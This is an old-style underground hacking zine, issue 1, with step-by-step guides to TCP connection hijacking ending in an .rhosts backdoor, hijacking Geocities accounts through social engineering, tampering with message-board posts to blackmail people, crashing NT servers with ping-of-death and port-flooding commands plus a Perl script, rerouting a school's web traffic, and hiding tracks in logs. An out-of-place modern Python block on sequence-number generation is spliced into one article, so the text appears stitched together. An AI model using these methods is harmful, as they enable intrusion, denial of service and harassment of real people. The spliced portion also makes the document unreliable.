::::::::::::::::::::::::::::::::00000::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::000000000::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::0000111110000::::::::::::::::::::::::::::
:::::::::::::::::::::::::::000001111100000:::::::::::::::::::::::::::
::::::Issue #1 Volume #1::00000011111000000:::Issue #1 Volume #1:::::
000000000000000000000000000000001111100000000000000000000000000000000
            < The premiere underground exploration zine. >
000000000000000000000000000000001111100000000000000000000000000000000
::::::Issue #1 Volume #1::00000011111000000:::Issue #1 Volume #1:::::
::::::::::::::::::::::::::00000011111000000::::::::::::::::::::::::::
:::::::::::::::::::::::::::000001111100000:::::::::::::::::::::::::::
::::::::::::::::::::::::::::0000111110000::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::000000000::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::00000::::::::::::::::::::::::::::::::

Good guys announce the security weakness, the bad guys keep it to themselves

----------------------=============================-------------------------
----------------------===>Web site of the month<===-------------------------
----------------------==>http://www.silitoad.org<==-------------------------
----------------------=============================-------------------------

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
This Months Table of Contents
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

1.Introduction
  *Biography - KciN
  *Editorial - Merde Fuk
  *Members - KciN
2.Hacking
  *Connection Hijacking Attack - Merde Fuk
    *The Basics
      *Three way Handshakes
      *.rhosts and trusted servers
      *SYN Flooding
      *Sequence Numbers?
    *The Attack
      *Short Explanation
      *Finding a target
      *Finding a targets Trusted Host
      *SYN Flood trusted host
      *Sample the sequence numbers
      *Spoof the trusted host
      *The heart of the Attack
      *Once inside..
    *Concluding paragraph.
  *Defacing Geocities - Krawl
  *WWWBoard Hacking - KciN
  *Windows NT exp0sed (Part I) - Merde Fuk
    *Introduction
    *Attacks and Hacks
      *Local Attacks
        *FileManager Hole
        *Ntfsdos Hole
      *Denial of Service
        *Ping of Death
        *IIS Attack
        *Telnet Attack
  *Novell Ip Re Routing Attack - KciN
  *Getting away Scott free - Merde Fuk
3. Phreaking
  *Pitting - Lord Duke
  *Modified SNI phreaking
4. Anarchy
  *How to kill someone - PentiumRu
5. Music
  *KoRn live in KC - ViolentJ

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
stnetnoC fo elbaT shtnoM sihT
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$$$$$$ Introduction $$$$$$$$$--------------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Hello fellow readers, welcome to issue 1 of the new 0 online zine. Along with this issue you will find only limited information on what is already stated in many texts that are found around the world. It would be great if we could stuff all of our knowledge into one huge issue, but it's this thing called a mental block: we don't really have the patience to do such a thing, so we're just going to bring it to you in blocks at a time, and whenever we feel like doing it. ;)

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$$$$$$ Bio-graphy $$$$$$$$$--------------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There's not really much to say about us at the moment, but since this IS our first issue, I feel as if I should provide you with at least a little information about the people who write for this zine. It won't be much, and if you want more, I guess you'll just have to dig it up yourself ;)

Don't know why we started, don't know if it will ever end, but it's here now, and for at least right now, it's here to stay (Tongue twister there).

We are here to provide YOU information at an easy level of understanding. If you are confused by most texts out there that use big words such as subnetmasking then this is the zine for you. All the texts are technical yet easy to understand.
You don't have to be a hacking veteran to understand what we are trying to explain. In the case of words that aren't usually used in everyday speech, those words will be explained in order for the reader to understand.

No, we're not trying to be like the Happy Hacker shit. In fact we hate the Happy Hacker articles, they are useless to everyone, with topics such as "Fingering servers". Oh no! Not fingering! And another thing about the Happy Hacker digest is, it's run by a total moron who wants to explain LEGAL things! That's stupid...I mean that's really retarded.

No, we're not trying to be like 2600, they are old news; with every issue of their magazine there is an article on redboxing.. My question is why? 2600 believes in "Freedom Of Information" but it makes me wonder, why is their magazine $5.99 a pop? This zine is free, and always will be free. It is done by people who in their spare time decided to provide you, the reader, information that is actually useful..

Well I have canned the goods in 5 short paragraphs.. That's what we are about, and what we do. If you don't like it, then I pretty much say you should not read on..

Later Folks
KciN

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$ Editorial $$----------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Alright, this is our first issue, and I'm damn proud of it. It has some solid, to the point but detailed explanations on security and that sort of thing. This issue has taken about a month and a half to compile, and thanks to 'The Banshee' we even have a place to host our little 'zine' at www.sinnerz.com/banshee/0. We came in contact for several reasons: for one he lives really near me (Merde Fuk), and for another cuz he really digs what we are doing. No, we're not competing with any other 'groups'. In fact we don't even consider ourselves a group, but just a gang of people learning by doing and learning by teaching.
In this issue we do get into some complex subjects but they are well explained, to the point that you can understand them. The reason we don't have many articles on 'phreaking' or anarchy is based on the fact that none of the members really know much about phreaking but the bare minimum. But we did get some guest speakers to write some articles on phreaking, along with a very well known phreaker 'Lord Duke' who once called me up while pitting, so you know he knows what's up. We were going to have some articles from a dude named Modify with a review of firewalls that are currently on the market, but it never really edged out, same with a smart kid named Darkling, but he had to go away to some kind of camp or something and he couldn't be bothered with such.

So here it is, I really hope you guys enjoy this as much as we enjoyed compiling it all for you. So I'll see you guys in the next issue..

Merde Fuk

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$ Members $$----------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Here is the current member list. This can change at any time, cuz like we're cool like that. So far all the members live very close to each other and spend almost all day with each other.

KciN      - Editor and writer d00d
Merde Fuk - Techy of the gr00p
Banshee   - WebSpace Guy

Heh, well that's about it for now, all the rest are just guest writers who were either asked or volunteered to write some articles...

&&&&&&&&&&&&&&&&&&&&&&&&&
      H a c k i n g
&&&&&&&&&&&&&&&&&&&&&&&&&

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$ Connection Hijacking Attack! $$----------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

God, this is going to take a while! This article includes all the goodies, and in complete detail tells how to literally hack a server, using IP Spoofing, one of the most misunderstood terms in the underground. Stupid fuckers have been using IP spoofing to go on irc and brag to their friends that they are k-rad.
This is not why ip spoofing came around. In this text I will explain to you, in easy to understand language, that ip spoofing is just a step in the process of gaining access to a server you are not supposed to have access to.

The Basics
----------
In order to further understand what I am about to explain you must have a general knowledge of several things that I will explain in the following paragraphs...So no need to start to pout yet ;)

Three way Handshakes
--------------------
In order to start an actual data transfer of any kind on a network you must have what you call a "three way handshake". It goes much like this. You send what is called a SYN packet to a host; the SYN packet has headers which in turn tell the host that you want to connect to him. The host sends you back an ACK command, which tells you that it's alive and open for connections. Then you again send out an ACK command to the host telling it that you're still alive, and the data transfer can begin. If that's a little confusing, I agree, it's confusing in words, but let me make a small diagram of what a three way handshake looks like:

YOU --SYN-----> HOST   (You send out a SYN Packet to the host, telling it you want to connect)
YOU <--ACK----- HOST   (Host responds with an ACK or acknowledgment that it is alive and open)
YOU -----ACK--> HOST   (You respond back and the data transfer can now begin..)

Every time you do a regular data transfer on the internet, such as bringing up a webpage, this three way handshake commences. So now you know how data gets from that machine to yours. This little bit of information is the basis of this attack.

.rhosts and trusted servers
---------------------------
Alright, let's say you have an internet account with a local Internet service provider (ISP), AND you have an account with another server, which gives you a shell account. A shell account is basically an account on the server's UNIX operating system.
They give you a home directory in which you have access to text editors such as Joe and Pico, and you can also work on c programs using the gcc compiler. O.K., now let's say you want to save some time, so you want to make the process of logging in to the shell account shorter, or maybe eliminate it completely. Well, due to the trust that a UNIX operating system has with its users, this can be done: the process of entering a password at the login screen can be eliminated. This can be done with a file called .rhosts, which will grant or deny access based off the IP address of the person trying to log on to the shell account itself. The server that is in the .rhosts file is called the trusted server, for the fact that when the target sees that IP address it trusts them. It thinks that they are the person that is supposed, and allowed, to be there. UNIX will trust ANYONE with the specified ip address in the .rhosts file.

SYN Flooding
------------
A port on most UNIX operating systems can only handle a certain number of connections to one port at a time; this is called the "backlog". If the backlog is filled up, all incoming SYN connections will be ignored, leaving them not allowed to connect to the server until the other connection requests are dealt with properly. But if the SYN headers are spoofed when sent to the host, the host will keep on trying to successfully find the person who sent the original SYN message to it, and won't let anyone connect until it is done. Here are the steps of a SYN Flood:

1) Person uses ip spoofer to spoof his original ip address and sends out several SYN packets to a specified port at a host.
2) The host's port gets flooded with SYNs and tries to reply to the SYN command but can't, because the person who sent the original SYN is not a real host, leaving the ports closed, so no other connections can be made into that host.
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST | From here on all other connections
YOU (Spoofed IP) --SYN-----> HOST | Will be ignored because all the
YOU (Spoofed IP) --SYN-----> HOST | connections are taken
YOU (Spoofed IP) --SYN-----> HOST |
X (Not really real) <--ACK-- HOST |

So in turn the HOST cannot find YOU (with the spoofed IP), so the port is left flooded because the host will not drop the connections until they are fulfilled. After a bit the server will crash.. This is called a "Denial of service attack", for the fact that it denies anyone else service to that host. You can read more about denial of service in this newsletter.

Sequence Numbers?
-----------------
Sequence Numbers are a prime factor in this attack, but also kinda hard to explain. I only have a general knowledge of sequence numbers, but a general knowledge is a hell of a lot better than no knowledge ;)

Every byte that you transfer from one computer to another on an Internet network is assigned a sequence number. Sequence Numbers are assigned to make sure that the connection that is made doesn't become corrupt. Let's say we didn't have sequence numbers, then maybe by accident we got a repeat of a byte; that would corrupt our data right there. In a three way handshake, the first sent SYN packet contains what is called the Initial Sequence Number; that sequence number tells the host what the next sequence number is. (Confused yet?) This will all come together when I explain the attack itself, it's all got to do with timing and round trip time. Round trip time is how long it takes your SYN packet to reach the host and the host to send back its ACK (acknowledgment). Let's say you had to do this all by hand: you send out the SYN command, and the host sends back the ACK command, and you have to calculate the exact sequence number timing in order to send the ACK back to the host to start the data transfer.
-If the sequence number you send is a smaller number than what the server expects, it will just throw that try off, because it thinks it's an old packet that never reached or has failed before.
-If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin.
-If the sequence number you send is greater than what the host expects, it will hold that sequence number, because it thinks that it is a future bit, and it will hold it until the other bits come through first..

Trust me, this may all sound stupid now when I'm explaining it, but it all does come together when I start explaining the attack: you need to be able to spoof the ACK command that goes to the host when doing the 3 way handshake.

Oh, and each time a connection is made to the host that you are making the connection to, the sequence number goes up 64,000. The Initial Sequence Number goes up 128,000 every one second, and wraps every 9.32 hours. This counting process will be needed later on in the attack..

The Attack
----------
I really can't express enough how much you need to understand the above features before going and trying to execute this attack, just for the fact that you will not be successful in your attempt otherwise. It took me 3 good days of reading to readily understand sequence numbers, and I suggest you also read all you can on sequence numbers: do searches, read internet protocol articles, just make sure you understand what you are doing before you get your hopes up, only to find out that you didn't calculate the round trip time right and you end up with a smaller sequence number than originally intended. It's a bummer and a waste of time if you don't understand it.
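The counting rule above (128,000 per second, 64,000 per connection) describes a single global counter, and that is why later TCP stacks replaced it. As an added example, not part of the original article, this Python model compares that legacy generator with the per-connection scheme from RFC 6528 and checks whether an ISN handed to one peer reveals the ISN handed to another. The class names, the sample 4-tuples and the use of HMAC-SHA256 for the RFC's function F are assumptions made for the illustration.

```python
import hashlib
import hmac
import struct

MOD = 2 ** 32
PER_SECOND = 128_000        # article's figure: ISN increase per second
PER_CONNECTION = 64_000     # article's figure: ISN increase per connection
PER_MS = PER_SECOND // 1000

# Constructed sample 4-tuples (src ip, src port, dst ip, dst port).
OBSERVER = ("192.0.2.10", 40000, "198.51.100.5", 25)
OTHER_PEER = ("192.0.2.77", 1023, "198.51.100.5", 513)


class LegacyIsnGenerator:
    """One global counter driven by the clock and the connection count."""

    def __init__(self, boot_value=0):
        self.boot_value = boot_value
        self.connections = 0

    def next_isn(self, now_ms, four_tuple):
        # four_tuple is ignored: every peer reads the same counter.
        isn = (self.boot_value + PER_MS * now_ms
               + PER_CONNECTION * self.connections) % MOD
        self.connections += 1
        return isn


class Rfc6528IsnGenerator:
    """ISN = M + F(4-tuple, secret), with M a 4-microsecond timer (RFC 6528)."""

    def __init__(self, secret):
        self.secret = secret

    def next_isn(self, now_ms, four_tuple):
        material = "|".join(str(part) for part in four_tuple).encode()
        # Assumption: HMAC-SHA256 stands in for the RFC's keyed function F.
        digest = hmac.new(self.secret, material, hashlib.sha256).digest()
        offset = struct.unpack("!I", digest[:4])[0]
        timer = (now_ms * 250) % MOD      # 250 ticks of 4 us per millisecond
        return (timer + offset) % MOD


def predicted_hits(generator, sample_times_ms, gap_ms=50):
    """Count how often the legacy counting rule, applied to an ISN the
    observer received, equals the ISN given to a different peer gap_ms later."""
    hits = 0
    for now_ms in sample_times_ms:
        seen = generator.next_isn(now_ms, OBSERVER)
        guess = (seen + PER_MS * gap_ms + PER_CONNECTION) % MOD
        actual = generator.next_isn(now_ms + gap_ms, OTHER_PEER)
        hits += int(guess == actual)
    return hits


def wrap_hours():
    """Hours for a 32-bit counter to wrap at the article's per-second rate."""
    return MOD / PER_SECOND / 3600


if __name__ == "__main__":
    times = [1_000, 5_000, 20_000, 90_000, 400_000]   # constructed sample times
    legacy = LegacyIsnGenerator(boot_value=123_456)
    hardened = Rfc6528IsnGenerator(secret=b"constructed-demo-secret")
    print("legacy predictable samples:  ", predicted_hits(legacy, times))
    print("RFC 6528 predictable samples:", predicted_hits(hardened, times))
    print("legacy wrap period (hours):   %.2f" % wrap_hours())
```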
Short Explanation
-----------------
1)Choose the target
2)Find trusted host
3)SYN Flood trusted host
4)Spoof the trusted host
5)Guess the sequence numbers for the outgoing ACK
6)Make the connection
7)Leave a backdoor in the .rhosts file

Finding a Target
----------------
This should be fairly easy if you're the kind of person who has a personal vendetta with a server, or you just want one to try this out on. Or you can get special permission from 2 hosts that will allow you to do this as a security measure; that is probably the best way to go to avoid any sorts of criminal prosecutions. I urge you to not in any way incriminate yourself. This text is for security reasons only, to inform and protect. This attack is NOT new, I did not make up this attack, I'm only explaining it, and how to prevent it. So don't come crying to me when you get raided and you have nowhere else to go. Stay safe and be paranoid.

Finding a targets Trusted Host
------------------------------
Once you have your target, you want to find out if it has a trusted host. Since you can't go into their computer and look to see if they even have an .rhosts file, you have to do the checking out yourself. If the target host does not have a trusted host, this whole text is very pointless, but from here on in, I am talking as if the target host does in fact have a trusted host. This is where you use your talent of social engineering. Finding the trusted host is hard, I'll admit that, but if you're going to go this far you might as well find out about the system you're going to hack. Know what you're doing, know the system before you go in. Here is a list of possible ways to maybe gain information about trusted hosts.
showmount -e target                -> Shows where the file systems are exported
finger -l @target
finger -l @trustedserver.com
finger -l root@trustedserver.com
rpcinfo -p x-terminal

These are a couple of ways off the top of my head, but you can always find shit out. Basically use your head in this matter, because, well, this isn't the hardest part of the attack. It may seem that way now, but it only gets harder from here on out. Talk to a representative of the company, I dunno, read up on social engineering... Overall this attack all comes down to trusted hosts, which are inserted into the .rhosts file itself. This is why I spent some time explaining .rhosts files, because if you can become the trusted host you also have access to the target host. Is this getting better by the minute or what?

SYN Flood trusted host
----------------------
In order for this whole thing to go through, the trusted host must be taken out with a SYN flood (SYN Flood was discussed earlier in this article). In later parts of this attack you need to spoof as the trusted host, then send out a SYN command to the target host's port to try to connect to it. If the host you're attacking can send a message back to the trusted host, it would get an error saying that host did not send out a SYN packet for an opening connection. So, to make sure that does not happen, you must flood the ports of the trusted host so no other connections can be made.

*NOTE* This is because you are flooding ports on the trusted host, and while the port on the trusted host is still looking for someone to send back an ACK command to (it is still gagged by the SYN flood), it doesn't let any other connections come through. So you can successfully guess (IN time) the sequence numbers that the trusted host would send to the target host.
SYN flooding software is readily available at many "Underground" sites and I won't go into posting the code here, for the fact I'm just wasting space when you can do a search on the internet yourself and find it. For example a very good spoofer/SYN flooder can be found at http://main.succeed.net/~coder. But this NEEDS to be done, you don't need any interruptions in this attack.

Sample the sequence numbers
---------------------------
Because you are not the real host, you are merely a spoofed version of the trusted host, you also have to spoof the return sequence number. Remember, in the three way handshake there is first a SYN from you, that tells the host that you want a connection to its server, then the host sends back an ACK or acknowledgment. So if you spoof the trusted server and send out a SYN packet, the server you just sent the SYN packet to will try to reply back. If you don't guess the right sequence numbers (OR the timing of the transfer) it won't let you log in. See, if the REAL trusted host was available (not under a SYN flood) the real trusted host would have given the other host an error. But with the SYN flood gumming up the works, and not allowing any other connections, you can successfully spoof the ACK back to the host so you can connect.

Before you do the initial attack, connect to one of the major ports on the server you're going to attack, like port 25 (the sendmail port), and sample its sequence numbers. You need to calculate how long it takes for your SYN to reach the server and a SYN/ACK to be sent back to you, then the ACK you send back to the host, all in one. Do this many times until you have enough that you feel is a good diagram to round up and become one figure. Remember sequence numbers go up 128,000 a second, and 64,000 per connect.
-If the sequence number you send is a smaller number than what the server expects, it will just throw that try off, because it thinks it's an old packet that never reached or has failed before.
-If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin.
-If the sequence number you send is greater than what the host expects, it will hold that sequence number, because it thinks that it is a future bit, and it will hold it until the other bits come through first..

Spoof the trusted host
----------------------
This is easy, there is a lot of ip spoofer software for linux and the unix flavors, just pick one of these up and compile it.

*NOTE* You must have root on the linux operating system you are doing the attack from, for the fact that if you just have a regular home directory you cannot open up the raw connections which are needed for a general spoof.

So load it up and spoof the address of the TRUSTED host, and go right on to the next part.

The heart of the attack
-----------------------
This is the main part of the attack. Once you are spoofed as the trusted host, you should send a connection request to port 513 (the login port). The host will then send back a SYN/ACK to the trusted host, which is under the gagging of the SYN Flood, so it won't accept any more connections, hence the target won't get an error back. While this is all going on we have to wait for a bit for the SYN/ACK to be sent to the host. Now you must send an ACK back to the host you are attacking with your guessed sequence number attached (plus one because we are sending for a login). If your guess is correct it will then accept your connection. Type the magical word root, and since that .rhosts file is there, and you are spoofed as the trusted host, you will get automatic access to the system. Isn't unix great? Trust is a great thing to encounter in any type of linux operating system.

Once inside..
-------------
Since you really don't need to edit or destroy any log files, you are home free, but as one last thing we do, we will put in a backdoor so we can access their system as we please (no more of this spoofin shit), so we do a cat + + >> ~/.rhosts . When you add a + + (as explained earlier) it's basically saying any host is allowed without entering a password. The only problem with that: a lot of systems nowadays are equipped with a program that looks for .rhosts files that have a + + entry.. But oh well, fuck it, you're in it just for the hack of it, right?

Conclusion paragraph
--------------------
Basically this attack is very useful if you know what you are doing. This wasn't as 'in depth' as I would have liked to go, but well, I'm not the kind of person who can splash what's all in my head onto a piece of paper; it's easier for me to consume information than give it away. But I tried my best and I hope you could understand it.

I'd like to give a couple shoutouts to the people who made this article happen: Phrack, Modify for teaching me the art of spell check, and the whole 0 cr3w.

Remember, before asking a question, always try to answer it yourself first.

Phe3r m3,
Merde Fuk

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$$ Defacing Geocities $$$----------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Okay, here we go... First things first, find your target, your enemy. Find out his/her first name, last name, birthdate and such. Maybe check an autobiography that's on their site or just ask them through email or a chat thing, like IRC or say Powwow. Act casual, don't go on saying "Yo, bitch, whats yo sign", act like their "friend". Hell, they don't have to know it was you!

Next, when you know your enemy... go here: www.geocities.com/help/pass_form.html

Yes, this is the page where you are able to hack the account, and if you know your enemy it just takes a minute. So, you fill out the shit.
Then there's a form that says

  E-mail Address in Profile (Even if it is invalid or no longer working)

fill it in.. Then below it it should have another form saying

  New/Correct E-Mail Address (Address Password will be sent to)

fill it in.. (your address, so you may receive verification). Submit.

Now it is sent via CGI to a real Geocities employee, and they will write you back.. personally.. so expect a delay in getting written back to. It will take 1-3 days or so depending on how busy they are of course. But hey, guess what boi'z and grrl'z! THEY DONT GIVE A FUCK, trust me. So, you check your mail.. hey this is cool, it's got their password!

Now what you do is go here: www.geocities.com/homestead/file_manager.html. Log on as the user, and use the password that you have received thru mail. Hah, now you're in THEIR directory.. First things first, change their profile.. you know, change their names, birthdate and password of course! Make sure you change either their name (first or last) or birthdate so they cannot receive verification, because their information will be wrong. So they'll be like...WTF??!?!? Muahaha, now change the site however you want! This is where YOUR creativity comes in, don't forget to leave your signature. Del, Edit, Leech, whatever. Now wasn't that fun?

note: You must have all the information to submit it. If any of the information is wrong, you will get mail saying that something was wrong, and not get the password.

Smart people can avoid getting broken into by not telling ANYONE who they/you are, or change your profile to something that's fake, change your birthdate, first/last name, and use passwords that only YOU would think of (must be 8 characters or less). No, changing the address won't boost your security.

But remember there are other ways to HACK, probably BETTER ways to do it. Remember, nothing is secure or as secure as you think. Hell, some teenagers hacked the Pentagon.
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$$ WWWboard Hacking $$$--------------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Yes, everyone knows the silly ass ways of getting a password file off of a wwwboard that was made with matts wwwboard script. But I'm here to say there are other ways to make life living hell on a wwwboard, and not just for matts script either.

* Have you ever wanted to spoof your ip address when they have those IP catchers (or domain name catchers)? This is the text for you.
* Have you ever wanted to change someone's words around on a post so they are saying something completely different from what they really said? This is the text for you.
* Have you ever wanted to just erase someone's existence off the wwwboard without the use of the wwwadmin? This is the text for you.
* Have you ever wanted to make the wwwboard index.htm page say what you think it should say? This is the text for you.

These are just a few things you can do with the technique I'm about to describe. I have to admit though, it's not really hacking, it's more of a game with permissions. As you might or might not know, permissions tell the unix operating system who can read, write, access, delete, and change files. For example, the user 'root' on a unix box can do anything he wants. But if you're just a regular everyday user on a unix box you get a home account, and file permissions look like this in your directory:

*Directory   drwxr-xr-x   (World readable but owner can do what he wants)
*file.txt    -rw-r--r--   (World readable but owner can do what he wants)
 ^File       ^File permissions

Now it's true that if you run a wwwboard, your directory for the wwwboard is set as a normal directory (drwxr-xr-x) like any other directory in your home account, but once you enter the actual wwwboard directory we come up with the messages directory. As you can see it is set to chmod drwxrwxrwx, which means this directory is world writable, readable, deletable, updatable, everything that root has.
That means an everyday user can upload, edit, and download whatever he pleases in that directory.

Let's say you want to show off a little bit and want to make it so your domain name shows up as "fbi.gov" (if it has an ip catcher). This is easy as cake. First you make your message as you normally would at any point in time on the wwwboard, and find out what number your .html file became; in this case I will say the number is 666.html. So we go into the ftp site, and download 666.html into our own directory on our own computer. We go down to the part that has our domain name sitting there and replace it with 'fbi.gov'. But first we have to delete the 666.html file on the server before we can upload the new improved version. So delete it, and upload the new 666.html, and well, people will think you're the fbi. ;)

This is the basic thing you need to know on how to change around things on a wwwboard, and now it's time to think of your own ideas (I gave you a few at the beginning of this short little text). So go and play, and freak, piss, black mail people all you want, it's great fun, and well, it's not really illegal, for it's not hacking, it's just playing with simple file permissions.

Remember KciN loves you!
KciN

                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$$ Windows NT exp0sed I $$$--------------=========>>
                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Merde Fuk

Introduction
=====------->
This is going to be a 2 part series, one being here, and the next part will be written for the next issue of 0. So like read on and learn what I have posted here and then you will be ready for the next step.

Well, along with each operating system out there comes the dark side of hacks, cracks, holes, and other tasty tidbits which will be explained in complete detail. You've read my connection hijacking article, now be prepared for the next step of e-z-hacking, courtesy of moi, Merde Fuk.
Before I go into all this, I want to unravel some of the mystery about me. If you know me, you know I'm a complete asshole. But what you don't know is, you know me very well if you know my alter persona 'Merde Fuk'. I'm not going to say in this issue who I really am, but maybe in a future issue of 0. Who knows, I might not.

NT has been famous, much like unix, for having unlimited security flaws; every day there is a new hole being discovered in this flavor of operating systems. My friend Banshee has found one of them (which will be explained in this text). I would love to go into complete detail as I did with the connection hijacking text, but it might be pretty much impossible, so I will try (TRY DAMNIT!) to explain each attack in detail. So bear with me folks, cuz here we go.

Local Attacks
-------------
These are the attacks which are performed at the computer itself, not remotely, meaning that these are attacks that are done once you are inside or literally physically at the computer.

FileManager Hole
----------------
In MS Office 7.0 there lies a very interesting hole. MS Office comes with a shortcut bar, which holds ms write and all that office stuff; this also holds a file manager type of program. Any old user can access that file manager, and any old user has control over any old file no matter what file permissions are upon it.

Ntfsdos Hole
------------
Secure file systems on the nt operating system can be read by a normal user, or really the login can be bypassed and they can be read by a person with Ntfsdos.exe on a bootup disk. When you boot up with the Ntfsdos.exe program, all information that is saved on the hard disk can be read.

NT Denial of service attacks
----------------------------
Ha, for some reason denial of service attacks are always called lame, but why? Because the people who say they are lame cannot do them, and whenever a person can't do something and the other person can, they call the other person lame, kinda like the Carolyn Meinel crowd.
Personally I think denial of service attacks are the most fun to execute, they may be considered lame, but wtf? Do what's fun, not what other people tell you you should and should not do! If you don't know what denial of service attacks mean, well here's a quick explanation: it's when you suck up so much of a resource on a server (IE multiple connections to one port) you soon lag them and even sometimes force them to either re-boot or re-connect to the internet. Most denial of service attacks are used just for the basis of destruction. Even when doing a connection hijacking you are doing it to literally take down a server to allow no more connections to a server.

Ping of Death
-------------
One good thing about windows 95 and NT is that it gives you the power of sending large packet pings, up to 165527 bytes. That's a lot. When you send a large amount of ping data to a server it starts to lag, then usually on NT machines and 95 boxes gets an error like

STOP: 0X0000001E KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

A nice little blue screen that forces you to either reboot or reconnect. I do not suggest this attack unless you are at least on a 36 connection, for the fact that if you start sending out large packets of pings you yourself will get lagged, it's kinda boring too. But if you're using windows here's the command in dos

PING -l 65527 -s 1 victim.com

PING = Ping
-l means I have no idea
65527 = how many bytes you want in the packet
-s 1 how many times to ping
victim.com the person you're wanting to "ping of death"

IIS Attack (Not Denial of service)
----------
This is a rather funny little attack, it gives a popup on the server, first crashing it then giving it a popup log error. To achieve this little effect telnet to port 80 which is the http port and type

GET ../..

and that's it, blah blah, what a piece of shit this nt is. Now you know why this article is called NT Exposed (as a piece of shit material for networking)

Another Telnet Attack
---------------------
Tisk tisk tisk.
Have you noticed since the dawn of nt servers there are no more needs for a brain in that world that I like to call "hacking"? No it's true, you don't need a brain to pull off a server crash on a NT server. Well you need to know how to read and type, know the basics. But man, this is really pathetic. This is another telnet attack in which you will laugh your little balls off (OR ovaries, not excluding anyone)

1) Telnet to an nt server on port 135
2) Type 10 characters followed by a
3) Exit your telnet program
4) Watch the server go nuts
5) Server crashes cuz it's a tardo system.

Here's a simple perl code I ripped from some NT security page

Save the above text as c:\perl\bin\poke, run like this:
C:\perl\bin> perl poke servername

/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";

$systemname = $ARGV[0] && shift;

$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports

for ($port = $0; $port<65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    chat::print ($fh,"This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
/*end poke code*/

So what have we learned kiddies? Don't take candy from bill gates. Look both ways before purchasing NT, and never ever underestimate the power of the GNU! Stay tuned phans for next month's thrilling conclusion of NT Exp0sed!!!!#@!#@ When we will learn more denial of service attacks, and more remote, and local attacks, won't it be grand? So be prepared folks.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$ IP Re-Routing Attack $$--------------=========>>
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
KciN

Let's start here: This little hack was one of the reasons that led me to getting kicked out of my college (at least I think it is), so what I'm saying is, it's not cool, if you get over your head it's not my fault, and you WILL get in trouble.
****THIS WILL ONLY WORK ON A WEBPAGE THAT IS RUN OFF A NOVELL NETWORK****

In dos

Go to the network's main drive, the one that all the tcp configurations are run off of, for example mine was drive N:\ (N = network?). When you get there, there is a directory called "tcp", guess what that is! From there go into either of two options that I know of (only been on 2 large novell networks), it should be under, in my cases, tcp.cfg and some other thing I forgot. Then "edit tcp.cfg" and you should see a screen like this

204.33.333.22 dns
555.53.332.22 back
111.2.22.222 ftp
33.333.33.333 stmp

Or something like that, I can't remember.. Well there was one of the ip's that was routed as the school's homepage. Now go home, turn on your computer, and connect to your isp, oh and don't forget to note your ip address (this is where it gets slightly complex), go back to school now, do all as above, but change the homepage's ip to your ip at home. Now your computer is the webpage server. Go home, make the proper directories, and do what you like, you know make it look better, and sit and wait for the feds...I did.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
<<=========-----------$$ Getting away scott free $$--------------=========>>
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Merde Fuk

Everyday you see some dumbass wanna be hacker getting arrested, suspended from school, kicked out of the house, getting raided by the feds for the stupid ass reason that the dumb fucker doesn't know how to edit log files! In this text I am going to explain the various log files, and where to find them and how to edit and replace them, using either your greatest hacking tool yet, that being pico, or use one of the log editor programs.

In this day in age, people use the internet as good ways to access other computers. Good idea, but you are also more susceptible to log files. When you gain root on a dial up there are no log files to be dealt with. The only true worry is that someone will trace your number back to the original caller.
